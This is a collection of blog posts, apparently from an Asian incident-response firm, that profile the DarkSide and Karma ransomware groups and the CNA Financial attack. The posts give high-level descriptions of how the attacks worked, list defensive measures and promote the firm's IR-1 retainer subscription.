The DarkSide ransomware gang announced its existence in August 2020. Less than a year later, the gang announced that they were ceasing operations, and shut down in May 2021, making it a short-lived yet extremely destructive criminal project that caused—amongst other high profile attacks—significant business interruptions to one of the biggest oil companies in the world.
While it was the May 2021 Colonial Pipeline attack that brought the name DarkSide into the global public discourse, security experts and criminal justice authorities have assessed DarkSide’s level of sophistication as high. This has led threat intelligence analysts to hypothesise that the DarkSide gang was made up of veteran cyber criminals undergoing a rebranding, and warns that we may soon see the DarkSide criminals appear in the cyber threat landscape under a new name.
Being aware of such a possibility, in November 2021, the US government declared that it is offering a USD 10 Million bounty for anyone who successfully reports the names of any DarkSide members.
Companies in Asia should view DarkSide as a dormant threat that could awaken at any time, ready to strike, and should learn from past attacks to prepare themselves.
Who is DarkSide?
DarkSide is the name of a cyber criminal group believed to be based in Eastern Europe and run by former affiliates of other ransomware gangs who decided to come up with their own brand of malware.
The attackers use highly sophisticated ransomware techniques against large for-profit organisations, encrypting their data under threat of publishing it on the open web. In exchange for a decryption key, DarkSide demanded ransom payments between USD 200,000 and USD 2 Million.
DarkSide presents itself as an "enterprise" gang due to its professional-looking website and attempts to partner with journalists and decryption companies. One key element of DarkSide’s branding is its mostly-consistent provocative public persona, presenting itself as a champion of the working people. In line with this, DarkSide firmly stated that they do not target the government, education, healthcare, funeral and non-profit sectors, and only aimed at making money from larger independent corporations.
This was reinforced by a Twitter post shared by DarkSide stating “Our goal is to make money, and not to create problems for society.” In a dark web post, the group posted receipts for donations of BTC 0.88 (then worth USD 10,000) each to Children International and to the The Water Project dated October 2020.
DarkSide conducts its activities according to a Ransomware as a Service (RaaS) business model, whereby the group provides third-party clients with the tools to carry out a ransomware attack, receiving commission as part of the extorted sum. Based on forum advertisements, the RaaS operators take 25% for ransom fees less than USD 500,000 but this decreases to 10% for ransom fees greater than USD 5 Million.
DarkSide promotes its ransomware by offering the option to publish victim data in stages—which may put additional pressure on victims to pay the ransom—and flaunting that their go-to data leak website receives “stable visits and media coverage.”
DarkSide adheres to the practice of double extortion, which involves demanding separate sums for both a digital key needed to unlock any files and servers, and a separate ransom in exchange for a promise to destroy any data stolen from the victim.
How does DarkSide Ransomware work?
DarkSide ransomware penetrates a company’s network and spreads across active endpoints within minutes, encrypting all information on the infected endpoints rendering it irrecoverable unless the ransom is paid.
Unlike other ransomware types that access computers through phishing links and email attachments, DarkSide’s sophisticated ransomware leverages backdoors in a network—akin to Palo Alto’s CVE-2019-1579 and Microsoft Exchange vulnerabilities—and compromised organisation connections. By infecting one company first and then spreading across to third-party partners, an unauthenticated attacker is able to execute malicious code remotely and carry out a breach.
DarkSide ransomware variants use the Silent Night botnet—also known as Zloader—for delivery. Zloader is a variant of the Zeus financial malware that has been targeting banks since 2006 and works as a first-stage Trojan loader that infects a victim's peripheral domain. Once a foothold is established, the Cobalt Strike red teaming tool is used to spread and deploy DarkSide ransomware.
After being downloaded onto network endpoints, DarkSide ransomware proceeds to encrypt files. It does this by using the Salsa20 encryptor, which is equipped with a custom matrix and RSA-1024 encryption algorithms. Salsa20 is a rapid encryptor that is near impossible to halt once it is in the network. DarkSide ransomware then kills processes that contain file unlocking capabilities and generates the following wallpaper:
Once the endpoint is encrypted and the message is displayed, users have a few days to pay out the ransom. When requested, DarkSide affiliates can provide “proof of life” by decrypting a small portion of the data to prove that they indeed have a working decryption key.
Notable Events
Perhaps the most notable event involving DarkSide is the May 2021 attack on Colonial Pipeline, which caused the shut down of the conduit that transports gasoline from Texas to the northeast of the United States, causing massive petrol shortages for consumers as well as disruptions on oil-dependent supply chains. On a given day, Colonial Pipeline carries 2.5 Million barrels of gasoline, diesel, heating oil, and jet fuel on its 5,500-mile route, providing nearly half of the East Coast’s fuel supply.
Colonial was able to use data backups to partially restore operations within a week from the attack, but the national average price for a gallon of petrol had pushed past USD 3 for the first time in almost a decade. President Joe Biden declared a State of National Emergency due to the attack and Colonial Pipeline eventually paid the Bitcoin equivalent of USD 4.4 Million to receive a decryption key and prevent its data from being publicly disclosed.
DarkSide's blog activity and Bitcoin wallet show that the group’s ransomware variants were highly active aside from the famous Colonial incident. In fact, cryptocurrency security firm Elliptic stated that a Bitcoin wallet opened by DarkSide in March 2021 had received USD 17.5 Million from 21 Bitcoin wallets (including the Colonial Pipeline ransom). In total, Darkside received over USD 90 Million in ransom payments from at least 47 victims.
How to Prevent a DarkSide attack?
Whilst DarkSide is currently a dormant threat, the gang’s members are likely still active in the cyber crime scene and are predicted to re-emerge with new ransomware variants in the near future. Protecting yourself from ransomware through proper cyber hygiene including regular offline backups, tightened security configurations, recurring patching, and installing a powerful EDR tool, are all proven strategies to bolster your cyber defences.
On top of this, preparing an incident response plan in collaboration with a specialist team like Blackpanda is crucial to minimise response time and losses in the event of a ransomware attack. As Asia’s premier Digital Forensics and Incident Response provider, we support our clients through best-in-class services like regular compromise assessments, tabletop exercises, and the creation of bespoke incident response plans.
IR1: The most effective cyber risk management solution for SMEs in Asia
Waiting for an attack to happen before you contact a cyber incident response team can cost precious time and a high hourly fee, which is why pre-purchasing a retained solution is the best way to optimise response time and minimise costs.
Blackpanda’s IR-1 subscription is the most effective solution for small and medium enterprises in Asia Pacific facing limited resources and knowledge in managing cyber breaches. IR-1 aims to help them manage cyber breaches and mitigate their impact by offering a 12-month subscription plan that includes 24/7 incident response availability, one incident response activation credit, discounted rates for Blackpanda services, and unlimited access to a digital library. IR-1 is staffed by highly trained specialists, and businesses can renew the subscription upon expiry.
Initially discovered at the end of June 2021, Karma ransomware is a relatively new malware. Researchers from SentinelOne found that the individual developer, known by the name ‘Eugene’, is rapidly updating Karma and continuously adapting it to cutting edge ransomware techniques. There is a strong possibility that affected companies have paid the requested ransoms, based on the lack of comment activity from Karma Site_admin on dark web forums.
Who is at risk?
Karma ransomware has been observed targeting various organisations across several sectors with no specific industry targets. Researchers say at least eight different companies have been affected by Karma between 2021-06-18 and 2021-06-25. So far, there have been no corporate data leaks. From this, we assume that the victims have paid the ransom or are in the process of negotiating payments to prevent data leaks.
Each of the eight concurrent versions of the ransomware seems to be improving and rapidly evolving to stay up to date with the latest ransomware techniques. This pace of evolution suggests that the developer, ‘Eugene’, is highly skilled and chooses victims carefully to target the most vulnerable.
How does Karma work?
Karma ransomware prevents access to an organisation’s data by encrypting files and systems. This is done through the following encryption process:
Generate random Chacha20 key
Encrypt file with Chacha20
Encrypt Chacha20 key with hardcoded ECC public key
Add encrypted key at the encrypted file
Append “KARMA”
Once files and data have been encrypted by Karma, targeted organisations are given instructions on how to pay the ransom to prevent their information from being sold or released to the dark web.
How can I protect myself?
Here is a list of actionable items you can take to protect your company from ransomware:
Building staff awareness regarding phishing attacks, including best practices on downloading and installing apps, choosing strong passwords and not exposing them to other personal websites;
Creating offline backups;
Separating network subsystems, and ensuring each of them has its own firewalls and gateways;
Monitoring for large file uploads;
Adopting email security best practices, filtering out malicious file types (EXE, VBS, XLS with Macros), and executing them in a local sandbox.
Organisations that have been impacted by any ransomware attack should immediately contact Blackpanda’s expert ransomware response and negotiation specialists.
Additionally, all organisations should follow these:
1. Stronger passwords:
Many of the most significant ransomware attacks that have occurred were due to simple passwords obtained through brute force attacks or dark web data breach sales. Ensure all employees use long-tail passwords that include symbols, numbers, and upper/lower case letters that are not affiliated with personally identifiable information like names, addresses, birthdays etc.
2. Activate multi-factor authentication:
Ensure every access point within your systems requires MFA. This provides an added layer of security and decreases the chance that a brute force attack will be able to access your data.
3. Adhere to the principle of least privilege:
The Principle of Least Privilege is the idea that any user, program, or process should have only the bare minimum privileges necessary to perform its function. The principle of least privilege works by allowing only enough access to perform the required job. In an IT environment, adhering to the principle of least privilege reduces the risk of attackers gaining access to critical systems or sensitive data by compromising a low-level user account, device, or application.
4. Sweep out old user accounts and passwords:
Audit a clean sweep of current users and delete older usernames and passwords that have access to your critical infrastructure.
5. Update all software and security patches:
Software and security partners are constantly updating their software to keep up with the daily evolution of hacking technology. It is important for your organization to apply updates and patches whenever available.
6. Back up your systems and data offline:
Employ strong, frequent backups to have important files and systems recoverable in the event of an attack.
7. Implement an Endpoint Detection and Response (EDR) solution:
An EDR system can help detect threats that are within your system so that you can respond to them in the quickest way possible. EDR solutions like SentinelOne can better protect your environment from ransomware attacks and other threats.
8. Have a risk transfer solution and cyber IR plan in place
Sophisticated ransomware will be able to get past anti-virus protections and firewalls offered by outdated cyber defence systems. Having a proper IR (incident response) plan in place, recurring compromise assessments, and comprehensive cyber insurance coverage can help your organisation best combat the constantly evolving threats in the cyber landscape.
The best cyber incident response and risk management solution for small and medium businesses: IR-1
Waiting for an attack to happen before you contact a cyber incident response team can cost precious time and a high hourly fee, which is why pre-purchasing a retained solution is the best way to optimise response time and minimise costs.
Blackpanda’s IR-1 subscription is the most effective solution for small and medium enterprises in Asia Pacific facing limited resources and knowledge in managing cyber breaches. IR-1 aims to help them manage cyber breaches and mitigate their impact by offering a 12-month subscription plan that includes 24/7 incident response availability, one incident response activation credit, discounted rates for Blackpanda services, and unlimited access to a digital library. IR-1 is staffed by highly trained specialists, and businesses can renew the subscription upon expiry.
In the aftermath of the largest ransomware attack to date, the importance of building resilience to such incidents is crucial.
Damages from ransomware go beyond data loss and large monetary expenses, as attackers often threaten to publicize stolen data if they are not paid immediately. Ransomware should be treated as a large-scale data breach, and organizations need to prepare for this eventuality by having a strong defense and recovery plan in place.
The CNA Financial Ransomware Attack
CNA Financial (“CNA”), one of the largest insurance companies in the US, announced that it had been hit by a sophisticated and debilitating ransomware attack this past March. The Phoenix cyber criminal group attacked CNA using the ‘Phoenix Locker’ malware, a variation of the Hades ransomware created by the Russian group Evil Corp. Whilst CNA declared that it did not lose access to any sensitive client data, over 15,000 company devices were encrypted and corporate networks were disrupted, forcing CNA to temporarily shut down its services.
CNA worked with private sector companies and US government agencies to secure its systems and contain the malware. To end the attack, CNA paid the attackers USD 40 million in Bitcoin – the largest recorded ransom payment ever – despite FBI guidelines discouraging companies from paying ransom demands, as payment strengthens attackers’ capabilities and increases the effectiveness of such attacks in the future.
The CNA Financial attack occurred within weeks of another ransomware incident hitting oil transportation company Colonial Pipeline, which paid USD 4.4 million to stop the attack and release its data. These cases are not isolated, and they serve as high-visibility examples of a pervasive ransomware problem that affects organizations of all sizes across the globe.
The Growing Incidence of Ransomware Attacks
According to reports from Bitdefender, 2020 saw a 485% increase in ransomware attacks compared to 2019, with a ransomware attack occurring every 11 seconds. In 2020, the average ransom request increased by over 170% from USD 115,123 to USD 312,493 according to Palo Alto Networks.
Ransomware attacks typically target confidential or essential user data. After the malware penetrates the system, the targeted data is encrypted and made inaccessible to the user or organization. The attacker then requests the victim to pay a fee in order to receive a decryption key that can be used to unlock their data and avoid permanent loss or publication on the Internet.
These attacks are highly compromising for organizations, not only for the data loss and reputational damage but because of the human emotions they leverage. Ransomware attacks often instill a sense of urgency, fear, and doubt that force people and companies to pay out large sums in the hope of recovering their data.
How to Respond to Ransomware
When an organization suffers a ransomware attack, the first call should be to your incident response team. Like medical first responders, trained incident response specialists are responsible for mitigating the effects of an incident in a timely and organized manner, including analyzing the intrusion, containing the impact, investigating the root cause, and remediating the issue with maximum efficiency and minimal business interruption.
At Blackpanda, our experienced team of ransomware professionals guide organizations through the process of dealing with a ransomware attack, helping to minimize losses, recover encrypted data, as well as negotiate and facilitate ransom payment.
In the event of a ransomware attack, your incident response specialists should conduct the following activities:
1. Containment & Loss Mitigation
Upon being notified of the incident, your IR team should immediately respond by quarantining and containing the ransomware, recovering as much data and digital assets as possible, and conducting digital forensics to attempt reverse engineering the malware and identify the attackers. Experienced ransomware specialists may also be able to identify and retrieve decryption keys from known ransomware databases to unlock data without resorting to paying the attackers.
Timely response is critical in the first hours of a ransomware attack, which is why Blackpanda recommends IR planning and all response terms be agreed upon prior to an incident. Such agreements are often best delivered either as part of a comprehensive cyber Insurance policy (or through a pre-paid IR retainer for those that do not qualify for insurance). At a bare minimum, companies should at least have an IR firm like Blackpanda on a Zero-Cost Retainer.
2. Ransomware Negotiation
If the IR team is unable to independently decrypt the data, they can help organizations facilitate the ransomware negotiation process given their understanding of different ransomware tools and techniques, the actors and motives behind an attack, as well as the competencies of the attackers. Negotiation efforts serve to achieve improved outcomes and provide the time and intelligence necessary for organizational leadership to make informed decisions.
Last year, 17% of ransom payers did not receive a working key to unlock encrypted data (Kaspersky, 2020). As such, a crucial part of the IR team’s work is also to assess the authenticity of decryption keys provided by the attackers through verified “proof of life” exercises.
3. Ransom Payment & Facilitation
Once the negotiation has come to an accord, the IR team guides the organization through the payment of the ransom (if required and legal), ensuring that all transactions are fully verified, transparent, secure, and auditable.
Organizations should also be aware that on 1st October 2020, the US Department of Treasury’s Office of Foreign Assets Control (OFAC) issued a globally enforceable advisory regarding ransom payments to sanctioned entities, with associated penalties of up to USD 1 million and 20 years in prison. Blackpanda fully supports an organization’s due diligence efforts throughout the decision-making process, working closely with international law enforcement partners such as the US Secret Service to identify threat actors and sanctioned-entity status.
4. Eradication & Recovery
Once the correct decryption key has been provided, your IR specialists will help decrypt all data, restore system health, and ensure that the malware and its root cause are fully eradicated. Your IR team should also maintain thorough documentation of the incident in compliance with insurance and other regulatory requirements (such as MAS Reporting Requirements), which can be a complicated and time-consuming process for organizations to conduct independently.
How to Prevent Ransomware and Mitigate Loss
The CNA Financial case is a haunting warning among many that ransomware attackers are becoming increasingly sophisticated—even the largest organizations with the most advanced preventive systems remain vulnerable to ransomware attacks.
While ransomware prevention can never completely eliminate the risk of falling victim to such attacks, it is crucial that organizations implement preventive best practices to minimize ransomware risk and mitigate potential loss.
1. Endpoint Detection & Response
Having an industry-standard endpoint detection and response (EDR) solution in place is essential. It can protect your system from known viruses and alert users when malware is detected attempting to enter the system. Traditional signature-based antivirus tools focus on blocking malware signatures from a predefined list of threats, leaving users vulnerable to new or mutated malware. Blackpanda recommends organizations invest in next-generation behavior-based EDR solutions (like SentinelOne) which use artificial intelligence to identify and alert users to suspicious and malicious behaviors.
2. Secured Data Backups
If EDR tools are like cyber-sentries, encrypted backups are like cyber-vaults. Avoid losing important data to a ransomware attack by keeping regularly updated and encrypted backups, both offline and with security-protected cloud offerings (such as Acronis). Data backups allow organizations to fully recover from a ransomware incident as well as provide greater leverage in ransom negotiations.
Knowing the precise location of all sensitive data is also crucial to limit exposure to attacks and minimize business interruption. Access to such data should be protected by multi-factor authentication (MFA), and the principle of least privilege should be strictly adhered to.
3. IR Planning, Retained Response, & Cyber Insurance
Given that even the most secure network is vulnerable to cyberattacks, having an incident response team and plan in place is essential. The most cost-efficient vehicle for retaining IR services is through a cyber insurance policy—at a mere fraction of the price of a traditional retainer.
Comprehensive cyber insurance providers such as Pandamatics Underwriting offer coverage up to USD 5 million, inclusive of all incident response fees, legal and public relations support, as well as discounted rates on next-generation EDR, encrypted backup solutions, and other pre-breach consulting services and technologies.
Conclusion
The CNA Financial and Colonial Pipeline ransomware attacks highlight the potential catastrophic disruptions such attacks can have on both individual organisations and the greater economy. With the increased frequency of ransomware across the world, ensuring effective response and recovery protocol is necessary for organisations to both protect their data and avoid large payouts.
On top of the hardening of systems security, knowing who to go to when an attack occurs is essential. Expert IR teams can aid organisations through the process of preparation and ransomware eradication through containment, negotiation with attackers, ransom payment guidance, and recovery support. Obtaining comprehensive cyber insurance will also help mitigate the impact of ransomware on organisations, covering financial loss and any costs incurred to contain and eradicate the threat.
IR-1: The most effective cyber risk management solution for SMEs in Asia
Waiting for an attack to happen before you contact a cyber incident response team can cost precious time and a high hourly fee, which is why pre-purchasing a retained solution is the best way to optimise response time and minimise costs.
Blackpanda’s IR-1 subscription is the most effective solution for small and medium enterprises in Asia Pacific facing limited resources and knowledge in managing cyber breaches. IR-1 aims to help them manage cyber breaches and mitigate their impact by offering a 12-month subscription plan that includes 24/7 incident response availability, one incident response activation credit, discounted rates for Blackpanda services, and unlimited access to a digital library. IR-1 is staffed by highly trained specialists, and businesses can renew the subscription upon expiry.
A terrain is usually defined as the ensemble of the features of a tract of land. Geographic terrains can be of many types—jungle, mountain, desert, urban, or otherwise—and with our increasing dependence on computers we have seen an entirely new kind of terrain emerge: digital. In fact, digital and physical terrains have more in common than you might think.
As a former US Army Special Forces officer and a lifelong computer scientist, I observed that the fundamentals of military tactics in physical terrain hold true in the digital terrain of cyber security. Cyber security and physical security are merely derivations of the original concept of security; cyber attacks are nothing more than modern versions of the attacks humans have always experienced, only played out on a digital “terrain”.
Cyber security is not an IT problem—it is a security problem.
For this reason, in building Blackpanda, we gathered exceptional individuals from military, law enforcement, and computer forensics backgrounds to develop bespoke and hyper-focused digital forensics and incident response services across APAC. Handling cyber incidents can be extremely stressful, requiring responders to act fast in an environment full of uncertainties. The focus and discipline we bring from our unique backgrounds have taught us to maintain our focus and calm in the worst situations, persevere in times of difficulty, prepare for the worst, and approach complex security challenges with clear, tried, and tested strategies.
The overlap between the physical and digital terrains forms the cornerstone of our approach to incident response. In this article, I delineate the specifics of our unique perspective in the hope that by better understanding the similarities between these terrains, readers will learn more about what we do, how we do it, and who we are as a company.
The Importance of Terrain Analysis
I consider myself a classically trained military strategist and tactician, both from my time as a West Point cadet studying Cold War-era combined warfare tactics and later as a counterinsurgency battlefield commander in multiple theatres of war.
When I joined the US Army as a commissioned second lieutenant in 2001, I was posted to the DMZ in Korea along the 38th parallel where I patrolled my tank and mortar platoons as part of the 2nd Infantry Division. Being stationed along the border to North Korea was considered a “hardship” tour—the training schedule was very fast-paced, and we had monthly alert sequences to defend against an invasion from the North.
I spent approximately 24 months in the frigid tundra of the Korean peninsula as part of the 2nd Infantry Division. Engineers, infantry, artillery, and attack helicopters all coordinated with my tank platoon and we moved as a single unit, although each had their specific roles and capabilities. We honed our skills with a tremendous amount of training on the combined arms training grounds in the rocky mountains of Korea. There, I practised complex tactical formations and honed my skills to analyse mountains, rivers, and deep valleys in defensive and offensive positions.
When developing a military plan, whether offensive or defensive, a tactician should first conduct an analysis of the battlefield terrain. Terrain analysis is critical for understanding the “chessboard” before even considering which pieces are in play, from both enemy and friendly elements.
For example, a hilltop spur is a key terrain feature of the Korean mountains that provides a valuable dominant position. From this vantage point, the army can command fields of fire over a valley. In a desert urban scenario such as Mosul in Iraq, one could position troops at a critical four-lane highway intersection of three major throughways. Holding such an intersection could prevent the enemy from moving quickly throughout the region.
In these two examples, one can see that understanding the terrain and using it to your advantage plays a critical role in obtaining an overwatch position that prevents the enemy from freely and quickly advancing past the troops.
Applying Terrain Methodology to Provide Better, Faster Incident Response in APAC
Our experience as an incident response and digital forensics company has taught us that no two cyber terrains are the same. Every organisation is a combination of a number of factors including industry, size, geographic location, culture, personnel, and many more. Thus, it would be naive as incident responders to treat every case with a one-size-fits-all approach.
At Blackpanda, we offer our clients on-call digital forensics and incident response services as well as pre-breach response planning, assessment, and consulting. While other incident response companies limit their intervention to showing up in the moment of a breach, our objective is to build long-term relationships and a deep understanding of our clients’ individual cyber terrains.
By doing so, we can provide better, faster incident response based on the mutual and comprehensive understanding of the environment—including both its advantages and vulnerabilities. We do this through seeking enhanced visibility, carrying out manned reconnaissance, and regularly conducting response readiness drills.
One of the most important things we do when we begin working with new clients is to install endpoint technologies that automatically monitor for threats and rapidly gather forensic data following an attack. These tools enhance our visibility across an environment and allow us to respond more effectively to an attack. They can be thought of as the initial scout and ensuring the tactical team that follows close behind can secure the position or, in this case, the endpoint.
Typical anti-virus tools simply act as gatekeepers, blocking only processes with known threat signatures. Behaviour-based EDR instead works by observing the overall activities of a computer, setting a baseline of normal behaviour in the environment, and flagging suspicious behaviours themselves—detecting even new threats with previously unrecognised signatures.
With both tools installed prior to a breach, the enhanced visibility of settings, behaviour, and forensic evidence allows our team to not only detect threats faster but also triage, hunt for similar activity across all endpoints, and decommission malware more quickly and efficiently during an attack.
Manned Reconnaissance | Compromise Assessments
Even the most advanced cyber security technologies may be thwarted or evaded as cyber criminals continue to evolve their tactics daily. For this reason, we highly recommend businesses amplify their reconnaissance efforts through regularly conducted human-led Compromise Assessments.
During a Compromise Assessment, our threat hunting specialists perform an inside-out investigative sweep of your cyber terrain for any signs of compromise including dormant, active, or past attacks that other tools may have missed. We use a continuously updated library of thousands of proprietary queries to search for malware on the network and assess the overall security posture of the organisation. We also scrape the Dark Web for leaked information and hacker forum chatter about the company that may indicate an existing compromise or foreshadow an upcoming attack.
The human-led, tech-enhanced, and comprehensive nature of Blackpanda’s compromise assessments means that our specialists form a deep understanding of your environment and overall security posture in the process.
We recommend organisations conduct Compromise Assessments at least quarterly, if not weekly or daily, depending on your risk tolerance. By regularly checking internal systems for vulnerabilities and early signs of attacks, our team will come to know an environment like the back of their hand—facilitating faster and more effective response to attacks on your organisation and also stamping out early problems before they reach their final form.
Regular Drills | IR Planning and Tabletop Exercises
In the military, one of the most critical factors of mission success is proper planning. Setting up scenarios and running through reaction protocols is the best way to ensure that response is prompt and effective, smoothing out any potential bumps and hiccups before a live engagement.
At Blackpanda, we provide the same level of preparation through our Incident Response Planning and Tabletop Exercises. We work closely with clients to understand their terrain and unique strengths, weaknesses, and requirements, designing detailed action plans for dealing with a range of threats. These Incident Response Plans and Playbooks cover everything from communications, escalation, and handover procedures to technical responses for individual attack types.
We then test those plans by conducting tabletop exercises—live practice runs where relevant actors across the organisation are involved in improving the speed and efficiency of response and recovery. Through these efforts, both Blackpanda and your internal team gain a stronger awareness of your digital environment, “terrain” features, advantages, and disadvantages.
In Closing: No terrain is ever 100% secure
The above terrain-focused methodology and pre-breach services allow us to develop greater visibility and deeper understanding of your organisation’s digital environment; however, no terrain—whether physical or digital—can ever be 100% secure.
In words taken from the world-class US Army Survival, Evasion, Resistance, and Escape (SERE) Level C School: “Preparation is the key to survival.”
As such, modern organisations must have a plan in place for when defensive measures fail and specialised emergency response is required. The best way to minimise damage and financial loss is by having a trained and professional incident response team on call, through Blackpanda’s IR-1 subscription, designed to help SMBs successfully manage cyber breaches and mitigate their impacts by reducing operational downtime and financial and reputational damages.
Just as each Army division specialises in a particular setting—whether airborne, armoured, infantry, or other—we chose for Blackpanda to focus on a “One-Kick Philosophy” of mastering digital forensics and incident response, unmatched in the cyber terrain.
We take a hyper-focused approach in preparing our clients for cyber incidents, ensuring that their networks are secure and intervening promptly when things take a turn for the worst. By contacting us before you are breached, we can help strengthen your security posture ahead of time and be promptly available in a time of crisis.
Our emphasis on preparedness is informed by our military background and terrain-focused methodology, reinforcing our identity as Asia’s premier digital forensics and incident response provider.
To learn more about our white-glove, Asia-focused digital forensics and incident response services, contact Blackpanda today.
No Results found.
Hm, we couldn't find anything that matches those search filters. Try using the keyword search instead.
Sign Up to Our Newsletter
Our weekly Asia Cyber Summary is a snappy, non-technical overview of regional cyber security news that helps you stay informed. Test it today, you can always unsubscribe.
.png)
.jpeg)
.jpeg)
.jpeg)
%20(1).jpg)
